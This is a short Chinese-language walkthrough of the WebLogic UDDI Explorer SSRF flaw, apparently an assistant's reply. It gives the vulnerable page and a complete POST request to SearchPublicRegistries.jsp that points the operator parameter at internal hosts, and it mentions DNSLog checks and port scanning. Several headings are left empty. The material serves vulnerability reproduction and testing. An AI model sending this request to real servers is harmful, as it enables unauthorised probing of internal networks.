Weblogic Server中存在SSRF(Server-Side Request Forgery)漏洞,攻击者可以构造恶意请求通过服务器端发起未授权的内部网络请求,可能导致敏感信息泄露或内部服务攻击。
漏洞版本:
测试环境搭建:
访问Weblogic UDDI模块:
http://target:7001/uddiexplorer/
在搜索框中构造恶意URL:
http://internal-server:port
点击搜索后,观察服务器是否向内部服务发起请求
直接访问SearchPublicRegistries.jsp页面:
http://target:7001/uddiexplorer/SearchPublicRegistries.jsp
修改请求参数:
POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: target:7001
Content-Type: application/x-www-form-urlencoded
operator=http://internal-server:port&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
直接观察响应:
使用DNSLog验证:
端口扫描:
如需更详细的复现过程或特定版本的利用方法,可以提供更具体的环境信息。